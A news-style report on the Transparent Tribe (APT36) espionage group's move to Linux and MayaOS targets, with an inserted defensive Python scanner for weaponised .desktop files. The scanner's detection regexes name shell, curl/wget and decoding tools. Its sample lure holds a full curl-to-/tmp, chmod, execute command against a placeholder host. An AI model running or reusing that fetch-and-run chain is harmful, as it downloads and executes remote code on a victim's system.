
Pakistani “Transparent Tribe” APT Targets Cross-Platform Impact


A cyber-espionage group linked to Pakistan has shifted its tactics to incorporate a broader range of legitimate software techniques in order to evade cybersecurity defenses. This group, known as Transparent Tribe, has been targeting government agencies and defense firms in India with cyberattacks focused on compromising Windows systems and Android devices. However, in its most recent campaign, Transparent Tribe has shown a preference for Linux systems over Windows computers, with a majority of attacks utilizing Linux Executable and Linkable Format (ELF) binaries that specifically target India’s homegrown MayaOS distribution.

According to Ismael Valenzuela, vice president of threat intelligence and research at cybersecurity firm BlackBerry, Transparent Tribe has historically concentrated its efforts on infiltrating India’s government, military, and private industry. While the group has targeted other regions such as the US, Europe, and Australia, its primary focus remains on India. By leveraging lures associated with the Indian government or governing bodies, Transparent Tribe has consistently aimed at compromising critical sectors in the country.

The cybersecurity landscape in South Asia is known to be active, with various threat groups targeting different countries in the region. For example, the India-linked Sidewinder group has previously targeted Pakistan, Turkey, and China, while the Patchwork group has launched attacks on Pakistanis through malicious Android apps on the Google Play store. Additionally, the China-linked Evasive Panda group has targeted Tibetan nationals in India and the United States, and another group referred to as ToddyCat has focused on groups in Vietnam and Taiwan.

Transparent Tribe, also known as APT36 and Earth Karkaddan, has previously used romance scams to distribute the CapraRAT Android malware, aiming to compromise Indian government officials with information on the Kashmir region. In response to the escalating cyber threats, Pakistan has allocated significant funding for cybersecurity research and development to enhance its technical capabilities.

The latest development in Transparent Tribe’s tactics is the targeting of Linux systems, a departure from its previous focus on Windows-based attacks. While the group is not considered highly sophisticated, it has succeeded by diversifying its techniques. By writing its tooling in cross-platform languages such as Python, Golang, and Rust, Transparent Tribe can produce programs for both Windows and Linux, which lets it reach MayaOS, the distribution widely used in India’s military.

Transparent Tribe has also experimented with Linux compromises, using a “desktop entry file” (a .desktop file) as an attack vector in some cases. These files tell a Linux desktop how to present and launch an application, including the command to run, and the group has used them in low-volume attacks. Earlier Transparent Tribe samples included Android targets, but BlackBerry’s analysis found no sign of Android malware in the recent campaigns.
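As an added example (not code from the article or from BlackBerry’s research), a small Python triage check over .desktop files: it parses the Desktop Entry group and flags the launcher traits that a weaponised lure tends to carry, since the Exec= value is an arbitrary command. The two sample entries and the example.invalid URL are constructed for the demonstration.

```python
import configparser
import re

# Heuristics for a weaponised .desktop file, from a defender's point of view: the
# Exec= value is an arbitrary command, so a lure needs the usual stage-loading
# ingredients (shell -c, a fetch tool, a scratch directory, a decoder) in it.
SHELL_RE = re.compile(r"\b(?:ba|z|da)?sh\b\s+-c|\bpython3?\b\s+-c|\bperl\b\s+-e")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
TMP_RE = re.compile(r"/(?:tmp|var/tmp|dev/shm)/")
DECODE_RE = re.compile(r"\bbase64\b.*-d|\bxxd\b\s+-r")
DOC_LURE_RE = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?)\b", re.IGNORECASE)


def parse_desktop_entry(text):
    """Return the [Desktop Entry] group as a dict; keys stay case-sensitive."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep 'Exec' rather than folding it to 'exec'
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def scan_desktop_entry(text):
    """Return the list of triggered heuristics; an empty list means clean."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    checks = [
        ("exec-via-shell", SHELL_RE.search(exec_line)),
        ("downloads-payload", FETCH_RE.search(exec_line)),
        ("runs-from-scratch-dir", TMP_RE.search(exec_line)),
        ("decodes-embedded-data", DECODE_RE.search(exec_line)),
        # an Application entry named like a document is the classic lure shape
        ("document-lure-name", entry.get("Type") == "Application"
         and DOC_LURE_RE.search(entry.get("Name", ""))),
    ]
    return [name for name, hit in checks if hit]


# Constructed samples (not from the original article): a stock launcher and a
# lure whose Exec= chain fetches and runs a file; the URL is a placeholder.
BENIGN = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\n"
LURE = (
    "[Desktop Entry]\nType=Application\nName=Report.pdf\nIcon=application-pdf\n"
    'Exec=bash -c "curl -s http://example.invalid/a -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a"\n'
    "Terminal=false\n"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("lure", LURE)):
        print(label, scan_desktop_entry(sample) or ["clean"])
```

Run over a user's ~/.local/share/applications and ~/Desktop, the check gives a quick first pass; the name-versus-type mismatch is the trait least likely to appear in a legitimate launcher.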

Furthermore, Transparent Tribe has incorporated legitimate tools and services into its attack infrastructure as part of the living-off-the-land trend. By utilizing email, compromised websites, Google Drive, VoIP services, and instant messenger apps like Discord and Telegram, the group can evade detection and operate stealthily. The weaponization of legitimate tools allows the group to blend in with normal network traffic and avoid arousing suspicion.

In conclusion, Transparent Tribe’s adoption of Linux targets and the use of legitimate software techniques underscore the group’s evolving tactics and adaptability in the face of increased cybersecurity measures. By diversifying its attack methods and leveraging legitimate services, Transparent Tribe continues to pose a significant threat to critical infrastructure and government entities in India and beyond.
